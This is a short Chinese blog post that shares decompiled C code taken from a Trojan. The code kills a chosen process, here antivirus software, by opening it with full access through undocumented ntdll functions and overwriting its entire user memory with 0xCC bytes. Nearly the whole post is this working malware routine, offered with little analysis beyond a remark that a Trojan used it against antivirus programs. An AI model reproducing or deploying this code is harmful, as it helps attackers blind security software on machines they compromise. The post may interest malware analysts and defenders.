R3进程清零法结束进程
进程清零,网上很多,这些是分析Trojan时,Trojan用来结束杀毒软件用的。呵呵。。。
/*内存清0法结束进程 来自Trojan 2010-09-05 ZwProtectVirtualMemory 未导出,需要编写专门的程序获取 typedef NTSTATUS (*PZwProtectVirtualMemory)(INHANDLEProcessHandle, IN OUT PVOID *BaseAddress, IN OUT PULONG ProtectSize, IN ULONG NewProtect, OUT PULONG OldProtect); ZwProtectVirtualMemory 未导出,需要编写专门的程序获取 typedef NTSTATUS (*PZwWriteVirtualMemory)(INHANDLEProcessHandle, IN PVOID BaseAddress, IN PVOID Buffer, IN ULONG BufferLength, OUT PULONG ReturnLengthOPTIONAL); typedef struct _OBJECT_ATTRIBUTES { ULONG Length; HANDLE RootDirectory; PUNICODE_STRING ObjectName; ULONG Attributes; PVOID SecurityDescriptor; PVOID SecurityQualityOfService; } OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES; typedef CONST OBJECT_ATTRIBUTES *PCOBJECT_ATTRIBUTES; */ HMODULE __cdecl FillZeroToTerminateProcess(int nPID) { HMODULE result; // eax@1 int ClientId_UniqueProcess; // [sp+0h] [bp-4Ch]@6 int ClientId_UniqueThread; // [sp+4h] [bp-48h]@6 unsigned int pAddress; // [sp+8h] [bp-44h]@9 void *Buffer; // [sp+Ch] [bp-40h]@6 size_t Size; // [sp+10h] [bp-3Ch]@6 HMODULE hModuleResult; // [sp+14h] [bp-38h]@6 char OldProtect; // [sp+18h] [bp-34h]@9 unsigned int i; // [sp+1Ch] [bp-30h]@7 HMODULE hObject; // [sp+20h] [bp-2Ch]@1 FARPROC fnZwOpenProcess; // [sp+24h] [bp-28h]@2 unsigned int ObjectAttributes_Length; // [sp+28h] [bp-24h]@6 int ObjectAttributes_RootDirectory; // [sp+2Ch] [bp-20h]@6 int ObjectAttributes_ObjectName; // [sp+30h] [bp-1Ch]@6 int ObjectAttributes_Attributes; // [sp+34h] [bp-18h]@6 int ObjectAttributes_SecurityDescriptor; // [sp+38h] [bp-14h]@6 int ObjectAttributes_SecurityQualityOfService; // [sp+3Ch] [bp-10h]@6 int ProcessHandle; // [sp+40h] [bp-Ch]@6 FARPROC fnZwProtectVirtualMemory; // [sp+44h] [bp-8h]@2 FARPROC fnZwWriteVirtualMemory; // [sp+48h] [bp-4h]@2 result = GetModuleHandleA("ntdll.dll"); hObject = result; if ( result ) { fnZwOpenProcess = GetProcAddress(hObject, "ZwOpenProcess"); fnZwProtectVirtualMemory = GetProcAddress(hObject, "ZwProtectVirtualMemory"); fnZwWriteVirtualMemory = GetProcAddress(hObject, "ZwWriteVirtualMemory"); if ( fnZwOpenProcess && fnZwProtectVirtualMemory && fnZwWriteVirtualMemory ) { CloseHandle(hObject); ObjectAttributes_Length = 0x18u; ObjectAttributes_RootDirectory = 0; ObjectAttributes_ObjectName = 0; ObjectAttributes_Attributes = 0; ObjectAttributes_SecurityDescriptor = 0; ObjectAttributes_SecurityQualityOfService = 0; ClientId_UniqueThread = 0; ClientId_UniqueProcess = nPID; Size = 0x1000u; Buffer = malloc(0x1000u); memset(Buffer, 204, 0x1000u); result = (HMODULE)((int (__stdcall *)(int *, unsigned int, unsigned int *, int *))fnZwOpenProcess)( &ProcessHandle, 0x1F0FFFu, // PROCESS_ALL_ACCESS &ObjectAttributes_Length, &ClientId_UniqueProcess); hModuleResult = result; if ( (signed int)result >= 0 ) { for ( i = 0x1000u; i < 0x80000000; i += 0x1000u ) { pAddress = i; hModuleResult = (HMODULE)((int (__stdcall *)(int, unsigned int *, size_t *, unsigned int, char *))fnZwProtectVirtualMemory)( ProcessHandle, &pAddress, &Size, 0x40u, // PAGE_EXECUTE_READWRITE &OldProtect); if ( (signed int)hModuleResult >= 0 ) ((void (__stdcall *)(int, unsigned int, void *, size_t, char *))fnZwWriteVirtualMemory)( ProcessHandle, pAddress, Buffer, Size, &OldProtect); result = (HMODULE)(i + 0x1000); } } } else { result = (HMODULE)CloseHandle(hObject); } } return result; }
2012-09-05
浙公网安备 33010602011771号